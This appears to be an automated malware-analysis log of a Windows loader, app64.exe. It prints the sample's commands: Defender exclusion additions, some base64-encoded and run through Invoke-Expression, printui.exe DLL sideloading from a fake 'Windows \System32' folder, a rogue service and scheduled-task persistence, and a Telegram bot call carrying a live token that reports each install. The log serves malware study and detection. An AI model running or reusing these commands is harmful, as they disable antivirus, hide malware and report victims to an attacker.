Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Users\user\Desktop\app64.exe NtCreateUserProcess: Direct from: 0x7FF7DF113E4F
Source: C:\Users\user\Desktop\app64.exe NtQuerySystemInformation: Direct from: 0x7FF7DF113E73
Source: C:\Users\user\Desktop\app64.exe NtClose: Direct from: 0x7FF7DF113E43
Source: C:\Users\user\Desktop\app64.exe NtDelayExecution: Direct from: 0x7FF7DF113E67
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')); Invoke-Expression $decoded;"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c mkdir "\\?\C:\Windows \System32"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c move /y C:\Users\Public\pyld.dll "C:\Windows \System32\printui.dll"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x590769\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x590769.dat" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start x590769
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@123716: Installed success.'});"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 14 /nobreak
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 16 /nobreak
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('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')); invoke-expression $decoded;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('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')); invoke-expression $decoded;"
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('qwrklu1wuhjlzmvyzw5jzsatrxhjbhvzaw9uugf0acaijgvudjptexn0zw1ecml2zvxxaw5kb3dzifxtexn0zw0zmii7dqpbzgqttxbqcmvmzxjlbmnlic1fegnsdxnpb25qyxroicikzw52oln5c3rlburyaxzlxfdpbmrvd3ncu3lzdgvtmziiow==')); invoke-expression $decoded;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('qwrklu1wuhjlzmvyzw5jzsatrxhjbhvzaw9uugf0acaijgvudjptexn0zw1ecml2zvxxaw5kb3dzifxtexn0zw0zmii7dqpbzgqttxbqcmvmzxjlbmnlic1fegnsdxnpb25qyxroicikzw52oln5c3rlburyaxzlxfdpbmrvd3ncu3lzdgvtmziiow==')); invoke-expression $decoded;"
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x590769 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x590769\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x590769.dat" /f && sc start x590769
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -command "invoke-restmethod -uri 'https://api.telegram.org/bot7985593430:aaef1nr-tpqit5epqkopg8e701bartuiav0/sendmessage' -method post -contenttype 'application/json' -body (convertto-json @{chat_id='1536131459'; text='[loader] user@123716: installed success.'});"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "invoke-restmethod -uri 'https://api.telegram.org/bot7985593430:aaef1nr-tpqit5epqkopg8e701bartuiav0/sendmessage' -method post -contenttype 'application/json' -body (convertto-json @{chat_id='1536131459'; text='[loader] user@123716: installed success.'});"
Source: C:\Users\user\Desktop\app64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('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')); invoke-expression $decoded;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('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')); invoke-expression $decoded;"
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('qwrklu1wuhjlzmvyzw5jzsatrxhjbhvzaw9uugf0acaijgvudjptexn0zw1ecml2zvxxaw5kb3dzifxtexn0zw0zmii7dqpbzgqttxbqcmvmzxjlbmnlic1fegnsdxnpb25qyxroicikzw52oln5c3rlburyaxzlxfdpbmrvd3ncu3lzdgvtmziiow==')); invoke-expression $decoded;"
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x590769 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x590769\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x590769.dat" /f && sc start x590769
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -command "invoke-restmethod -uri 'https://api.telegram.org/bot7985593430:aaef1nr-tpqit5epqkopg8e701bartuiav0/sendmessage' -method post -contenttype 'application/json' -body (convertto-json @{chat_id='1536131459'; text='[loader] user@123716: installed success.'});"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('qwrklu1wuhjlzmvyzw5jzsatrxhjbhvzaw9uugf0acaijgvudjptexn0zw1ecml2zvxxaw5kb3dzifxtexn0zw0zmii7dqpbzgqttxbqcmvmzxjlbmnlic1fegnsdxnpb25qyxroicikzw52oln5c3rlburyaxzlxfdpbmrvd3ncu3lzdgvtmziiow==')); invoke-expression $decoded;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "invoke-restmethod -uri 'https://api.telegram.org/bot7985593430:aaef1nr-tpqit5epqkopg8e701bartuiav0/sendmessage' -method post -contenttype 'application/json' -body (convertto-json @{chat_id='1536131459'; text='[loader] user@123716: installed success.'});"
Source: C:\Windows\System32\svchost.exe Code function: strtoul,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,strncmp, 28_2_682864E0
Source: C:\Windows\System32\svchost.exe Code function: strchr,pthread_mutex_lock,strcmp,strncpy,EnumSystemLocalesA,pthread_mutex_unlock,strcpy,pthread_mutex_unlock,abort, 28_2_68287D70
Source: C:\Windows\System32\svchost.exe Code function: getenv,GetLocaleInfoA, 28_2_68286680
Source: C:\Windows\System32\svchost.exe Code function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID, 28_2_00007FF8A7FB0348
Source: C:\Windows\System32\console_zero.exe Code function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID, 34_2_00007FF747151B38
Source: C:\Windows\System32\console_zero.exe Code function: GetLocaleInfoEx,GetLocaleInfoW, 34_2_00007FF7471517D0
Source: C:\Windows\System32\console_zero.exe Code function: EnumSystemLocalesEx, 34_2_00007FF747151700
Source: C:\Windows\System32\console_zero.exe Code function: EnumSystemLocalesW, 34_2_00007FF74715145C
Source: C:\Windows\System32\console_zero.exe Code function: GetLocaleInfoEx,FormatMessageA, 34_2_00007FF74713C254
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
